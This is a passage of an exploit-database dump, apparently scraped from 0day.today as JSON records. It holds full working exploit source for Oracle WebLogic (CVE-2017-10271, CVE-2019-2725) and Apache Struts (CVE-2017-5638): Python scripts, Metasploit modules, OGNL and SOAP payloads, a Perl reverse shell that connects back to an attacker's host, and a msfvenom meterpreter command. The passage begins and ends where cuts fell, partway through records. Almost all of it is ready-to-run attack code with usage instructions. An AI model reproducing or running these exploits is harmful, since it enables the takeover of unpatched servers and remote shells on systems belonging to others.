print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-20T05:11:11", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. 
If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "zdt", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-15T00:00:00", "id": "1337DAY-ID-27316", "href": "https://0day.today/exploit/description/27316", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vunlerability in Apache Struts\r\n version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed\r\n via http Content-Type header.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. 
If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n 'Author' => [\r\n 'Nike.Zheng', # PoC\r\n 'Nixawk', # Metasploit module\r\n 'Chorder', # Metasploit module\r\n 'egypt', # combining the above\r\n 'Jeffrey Martin', # Java fu\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-5638'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Mar 07 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])\r\n ]\r\n )\r\n\r\n @data_header = \"X-#{rand_text_alpha(4)}\"\r\n end\r\n\r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n\r\n ognl = \"\"\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|\r\n\r\n begin\r\n resp = send_struts_request(ognl)\r\n rescue Msf::Exploit::Failed\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if resp && resp.code == 200 && resp.headers[var_a]\r\n vprint_good(\"Victim operating system: #{resp.headers[var_a]}\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n #when ARCH_JAVA\r\n # datastore['LHOST'] = nil\r\n # resp = send_payload(payload.encoded_jar)\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload(generate_payload_exe)\r\n end\r\n\r\n require'pp'\r\n pp resp.headers if resp\r\n end\r\n\r\n def 
send_struts_request(ognl, extra_header: '')\r\n uri = normalize_uri(datastore[\"TARGETURI\"])\r\n content_type = \"%{(#_='multipart/form-data').\"\r\n content_type << \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\"\r\n content_type << \"(#_memberAccess?\"\r\n content_type << \"(#_memberAccess=#dm):\"\r\n content_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n content_type << \"(#ognlUtil=#container.getInstance(@[email\u00a0protected])).\"\r\n content_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n content_type << \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n content_type << \"(#context.setMemberAccess(#dm)))).\"\r\n content_type << ognl\r\n content_type << \"}\"\r\n\r\n headers = { 'Content-Type' => content_type }\r\n if extra_header\r\n headers[@data_header] = extra_header\r\n end\r\n\r\n #puts content_type.gsub(\").\", \").\\n\")\r\n #puts\r\n\r\n resp = send_request_cgi(\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')\r\n end\r\n resp\r\n end\r\n\r\n def execute_command(cmd)\r\n ognl = ''\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n\r\n # You can add headers to the server's response for debugging with this:\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('decoded',#cmd)).|\r\n\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start())|\r\n\r\n send_struts_request(ognl, extra_header: cmd)\r\n end\r\n\r\n def send_payload(exe)\r\n\r\n ognl = \"\"\r\n ognl << 
%Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{rand_text_alpha(4)}','.exe')).|\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|\r\n\r\n # Using stuff from the sun.* package here means it likely won't work on\r\n # non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to\r\n # work and I don't see a better way of getting binary data onto the\r\n # system. =/\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|\r\n ognl << %q|(#fos.write(#d)).|\r\n ognl << %q|(#fos.close()).|\r\n\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete())|\r\n\r\n send_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\"))\r\n end\r\n\r\nend\r\n\r\n=begin\r\nDoesn't work:\r\n\r\n ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|\r\n ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|\r\n ognl << %q|(#[email\u00a0protected]@getMethods(#c,'main',true).get(0)).|\r\n ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|\r\n ognl << %q|(#m.invoke(null,null)).|\r\n\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.String;'))).| # 
java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('run',null)).| # 
java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: 
[email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n=end\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27316", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-20T03:15:54", "description": "Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell.#### Usage Info\nTested with tomcat8\r Install tomcat8\r Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r Ex:\r Open: $ nc -lnvp 4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'", "cvss3": {}, "published": "2017-03-12T00:00:00", "type": "zdt", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-12T00:00:00", "id": "1337DAY-ID-27300", "href": "https://0day.today/exploit/description/27300", "sourceData": "# CVE-2017-5638\r\n# Apache Struts 2 Vulnerability Remote Code Execution\r\n# Reverse shell from target\r\n# Author: anarc0der - github.com/anarcoder\r\n# Tested with tomcat8\r\n\r\n# Install tomcat8\r\n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r\n\r\n# Ex:\r\n# 
Open: $ nc -lnvp 4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'\r\n\r\n\r\n\"\"\"\r\nUsage:\r\n struntsrce.py --target=<arg> --test\r\n struntsrce.py --target=<arg> --cmd=<arg>\r\n struntsrce.py --target=<arg> --ip=<arg> --port=<arg>\r\n struntsrce.py --help\r\n struntsrce.py --version\r\nOptions:\r\n -h --help Open help menu\r\n -v --version Show version\r\nRequired options:\r\n --target='url target' your target :)\r\n --test check if target is vulnerable or not\r\n --cmd='uname -a' your command to execute in target\r\n --ip='10.10.10.1' your ip\r\n --port=4444 open port for back connection\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport httplib\r\nimport os\r\nimport sys\r\nfrom docopt import docopt, DocoptExit\r\n\r\n\r\nclass CVE_2017_5638():\r\n\r\n def __init__(self, p_target):\r\n self.target = p_target\r\n # self.ip = p_ip\r\n # self.port = p_port\r\n # self.exploit()\r\n\r\n def generate_revshell(self, p_ip, p_port):\r\n revshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\\r\n \"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\\r\n \"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\\r\n \"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\\r\n \"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\"\r\n return revshell.format(p_ip, p_port)\r\n\r\n def generate_payload(self, p_cmd):\r\n payload = \"%{{(#_='multipart/form-data').\"\\\r\n \"(#[email\u00a0protected][email\u00a0protected]_MEMBER_ACCESS).\"\\\r\n \"(#_memberAccess?\"\\\r\n \"(#_memberAccess=#dm):\"\\\r\n \"((#container=#context['com.opensymphony.xwork2.\"\\\r\n \"ActionContext.container']).\"\\\r\n \"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\\r\n 
\"[email\u00a0protected])).\"\\\r\n \"(#ognlUtil.getExcludedPackageNames().clear()).\"\\\r\n \"(#ognlUtil.getExcludedClasses().clear()).\"\\\r\n \"(#context.setMemberAccess(#dm)))).\"\\\r\n \"(#cmd='{0}').\"\\\r\n \"(#iswin=(@[email\u00a0protected]('os.name').\"\\\r\n \"toLowerCase().contains('win'))).\"\\\r\n \"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\\r\n \"{{'/bin/bash','-c',#cmd}})).\"\\\r\n \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\\r\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\\r\n \"(#ros=(@[email\u00a0protected]\"\\\r\n \"Response().getOutputStream())).\"\\\r\n \"(@[email\u00a0protected]\"\\\r\n \"(#process.getInputStream(),#ros)).(#ros.flush())}}\"\r\n return payload.format(p_cmd)\r\n\r\n def send_xpl(self, p_payload):\r\n body = ''\r\n try:\r\n # Set proxy for debug request, just uncomment these lines\r\n # Change the proxy port\r\n\r\n #proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'})\r\n #opener = urllib2.build_opener(proxy)\r\n #urllib2.install_opener(opener)\r\n\r\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)'\r\n ' AppleWebKit/537.36 (KHTML, like Gecko)'\r\n ' Chrome/55.0.2883.87 Safari/537.36',\r\n 'Content-Type': p_payload}\r\n xpl = urllib2.Request(self.target, headers=headers)\r\n body = urllib2.urlopen(xpl, timeout=5).read()\r\n except httplib.IncompleteRead as b:\r\n body = b.partial\r\n except:\r\n pass\r\n return body\r\n\r\n def os_detect(self):\r\n cmd = 'uname'\r\n resp = self.send_xpl(self.generate_payload(cmd))\r\n if 'Linux' in resp or 'Darwin' in resp:\r\n print '[+] Unix-like OS system detected.\\n'\r\n else:\r\n print '[+] Windows OS system detected.\\n'\r\n\r\n def test_vuln(self):\r\n cmd = 'hacked'\r\n print '\\n[+] Testing ' + self.target\r\n resp = self.send_xpl(self.generate_payload(cmd))\r\n tags = ['<html', '<head', '<body', '<script', '<div']\r\n if any(tag not in resp.lower() for tag in tags) and cmd in resp:\r\n print '[+] Target possibly vulnerable'\r\n print '[+] Finger 
printing OS system..'\r\n self.os_detect()\r\n else:\r\n print '[-] Target not vulnerable\\n'\r\n sys.exit(0)\r\n\r\n def exec_cmd(self, p_cmd):\r\n print '\\n[+] Target: {0}'.format(self.target)\r\n print '[+] Executing: {0}\\n\\n'.format(p_cmd)\r\n resp = self.send_xpl(self.generate_payload(p_cmd))\r\n print resp\r\n\r\n def exec_revshell(self, p_ip, p_port):\r\n print '\\n[+] Target: {0}'.format(self.target)\r\n print '[+] Dont forget to listen on port: {0}'.format(p_port)\r\n print '[+] Attempting reverse shell...\\n'\r\n\r\n self.send_xpl(self.generate_payload(\r\n self.generate_revshell(p_ip, p_port)))\r\n\r\n\r\ndef main():\r\n try:\r\n arguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\")\r\n target = arguments['--target']\r\n test = arguments['--test']\r\n cmd = arguments['--cmd']\r\n ip = arguments['--ip']\r\n port = arguments['--port']\r\n\r\n except DocoptExit as e:\r\n os.system('python2 struntsrce.py --help')\r\n sys.exit(1)\r\n\r\n x = CVE_2017_5638(target)\r\n if test:\r\n x.test_vuln()\r\n if cmd:\r\n x.exec_cmd(cmd)\r\n if ip and port:\r\n x.exec_revshell(ip, port)\r\n\r\n\r\nif __name__ == '__main__':\r\nmain()\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27300", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-01T19:54:17", "description": "Exploit for windows platform in category web applications", "cvss3": {}, "published": "2019-05-01T00:00:00", "type": "zdt", "title": "Oracle #Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution Exploit #RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T00:00:00", "id": "1337DAY-ID-32626", "href": "https://0day.today/exploit/description/32626", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725\r\n# Date: 30/04/2019\r\n# Exploit Author: Avinash Kumar Thapa\r\n# Vendor Homepage: 
https://www.oracle.com/middleware/technologies/weblogic.html\r\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\r\n# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0\r\n# Tested on:\r\n\t#OS: Windows 2012 R2 (Build 9600).\r\n\t#Architecture : x64\r\n\t#System Language : en_US\r\n\r\n\r\n# CVE : CVE-2019-2725\r\n\r\n\r\n# Script Usage:\r\n# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps\r\n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1\r\n# Add the powershell command in the variable\r\n\r\n__author__ = \"Avinash Kumar Thapa\"\r\n__description__ = \"\"\"\r\nVulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server\r\n\r\nCREDIT STATEMENT:\r\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:\r\n\r\nBadcode of Knownsec 404 Team: CVE-2019-2725\r\nHongwei Pan of Minsheng Banking Corp.: CVE-2019-2725\r\nLiao Xinxi of NSFOCUS Security Team: CVE-2019-2725\r\nLin Zheng of Minsheng Banking Corp.: CVE-2019-2725\r\nSong Keya of Minsheng Banking Corp.: CVE-2019-2725\r\nTianlei Li of Minsheng Banking Corp.: CVE-2019-2725\r\nZengShuai Hao: CVE-2019-2725\r\nZhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725\r\n\r\n\"\"\"\r\n\r\nimport requests\r\nimport sys\r\n\r\nprint \"Exploit Written by Avinash Kumar Thapa\"\r\n\r\n\r\nexploit = \"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e 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\"\r\n\r\nurl = sys.argv[1]\r\n\r\nrequest_headers = {\"Accept-Encoding\": \"gzip, deflate\", \"Accept\": \"*/*\", 
\"Accept-Language\": \"en\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\", \"Connection\": \"close\", \"Content-Type\": \"text/xml\"}\r\ndata=\"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:wsa=\\\"http://www.w3.org/2005/08/addressing\\\" xmlns:asy=\\\"http://www.bea.com/async/AsyncResponseService\\\">\\r\\n <soapenv:Header>\\r\\n <wsa:Action>xx</wsa:Action>\\r\\n <wsa:RelatesTo>xx</wsa:RelatesTo>\\r\\n <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\">\\r\\n <void class=\\\"java.lang.ProcessBuilder\\\">\\r\\n <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\\r\\n <void index=\\\"0\\\">\\r\\n <string>cmd</string>\\r\\n </void>\\r\\n <void index=\\\"1\\\">\\r\\n <string>/c</string>\\r\\n </void>\\r\\n <void index=\\\"2\\\">\\r\\n <string>%s</string>\\r\\n </void>\\r\\n </array>\\r\\n <void method=\\\"start\\\"/></void>\\r\\n </work:WorkContext>\\r\\n </soapenv:Header>\\r\\n <soapenv:Body>\\r\\n <asy:onAsyncDelivery/>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope>\" % (exploit)\r\nresponse = requests.post(url, headers=request_headers, data=data)\r\nprint \"status_code:%s\" % str(response.status_code)\r\nprint(response)\n\n# 0day.today [2019-05-01] #", "sourceHref": "https://0day.today/exploit/32626", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2022-06-22T19:33:15", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-07T00:00:00", "type": "zdt", "title": "Oracle Weblogic Server Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-07T00:00:00", "id": "1337DAY-ID-32663", "href": "https://0day.today/exploit/description/32663", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' =>\n [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', 